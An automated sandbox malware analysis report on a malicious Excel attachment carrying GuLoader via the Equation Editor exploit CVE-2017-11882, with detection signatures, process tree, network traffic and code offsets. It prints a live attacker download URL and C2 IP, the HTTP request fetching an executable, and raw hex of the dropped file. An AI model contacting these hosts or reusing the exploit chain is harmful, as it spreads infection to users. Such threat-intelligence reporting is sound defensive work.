Loading ...

Play interactive tourEdit tour

Windows Analysis Report 70A and 90A, quantity 20000 tons.xlsx

Overview

General Information

Sample Name:70A and 90A, quantity 20000 tons.xlsx
Analysis ID:483688
MD5:3768dc6c162a6eb46c160c48916f76d2
SHA1:3387bace48ffd1c07cb17b99e6c7919e11bbc508
SHA256:5a95734977adad3b8ab8c71070fd89958b0ab5e756f297cf3303c697728f3ce9
Tags:GuLoaderVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 804 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2704 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2968 cmdline: 'C:\Users\Public\vbc.exe' MD5: C10CEF2B31864B5F9FB13B9AF78765B2)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1xnnBgB9%"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.690715580.00000000002A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.141.149, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2704, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2704, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2704, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2968
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2704, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2968

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.690715580.00000000002A0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1xnnBgB9%"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: 70A and 90A, quantity 20000 tons.xlsxVirustotal: Detection: 31%Perma Link
    Source: 70A and 90A, quantity 20000 tons.xlsxReversingLabs: Detection: 30%
    Multi AV Scanner detection for domain / URLShow sources
    Source: http://192.3.141.149/fresh/SENSATIO.exeVirustotal: Detection: 10%Perma Link
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exeVirustotal: Detection: 20%Perma Link
    Source: C:\Users\Public\vbc.exeVirustotal: Detection: 20%Perma Link

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov eax, eax
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.141.149:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.141.149:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 70MB

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1xnnBgB9%
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewIP Address: 192.3.141.149 192.3.141.149
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:38:12 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10Last-Modified: Tue, 14 Sep 2021 21:21:52 GMTETag: "1c000-5cbfb2b957c00"Accept-Ranges: bytesContent-Length: 114688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 0a b3 4e 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 50 00 00 00 00 00 00 00 15 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 42 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 10 00 00 2d e6 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 66 01 00 28 00 00 00 00 80 01 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 5b 01 00 00 10 00 00 00 60 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 34 0a 00 00 00 70 01 00 00 10 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 31 00 00 00 80 01 00 00 40 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /fresh/SENSATIO.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.149Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: 96D57846.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
    Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96D57846.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /fresh/SENSATIO.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.149Connection: Keep-Alive

    System Summary:

    barindex
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040284D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004028E6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004027C4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6377
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7C0B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2E1D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8A12
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6817
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A946C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A4662
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A087D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1E72
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A3271
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1277
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A224E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A025A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A3E5E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2852
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2250
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2CA5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1EB9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A22BD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8CB3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8AB1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A208E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0E8E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1685
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A189D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0A97
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A4CE8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A50EF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A02F9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8CC9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A04DB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A96DE
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A332B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8F27
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A973E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1B3F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7B0D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1913
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002AA517
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0F68
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A076C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2F60
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A4B40
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A875A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6350
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A91AB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6350
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A55AD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0BA2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1DA0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A53B8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0B88
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8981
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A219D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A4BE9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A49E0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A13CB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A41CE
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A19CE
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A9FC6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A29C5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A95DA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A53D8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002AA5D0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A25D7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6377 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6350 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6350 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A63BB NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: SENSATIO[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
    Source: 70A and 90A, quantity 20000 tons.xlsxVirustotal: Detection: 31%
    Source: 70A and 90A, quantity 20000 tons.xlsxReversingLabs: Detection: 30%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$70A and 90A, quantity 20000 tons.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFA16.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.winXLSX@4/21@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000002.690715580.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00406848 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00403E49 push ecx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00404E5E push 00000055h; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00403868 push 00000012h; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040886D push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00407676 pushad ; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040442D push esp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00406A30 push esp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00408E36 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004054C9 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00406ED5 push esi; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004078DF push ss; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00403AF4 push esp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004090F7 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004050F8 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004078F9 push esp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00404E85 push edi; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00409887 push ss; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040468F push ecx; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00406A92 push esp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00407B45 push eax; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00409945 push esp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405F51 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00403952 push 00000012h; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00404F54 push esi; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00403B66 push esp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00408769 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00408B6B push esp; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040956C push ebp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00404174 push esp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00407F79 push esi; ret
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
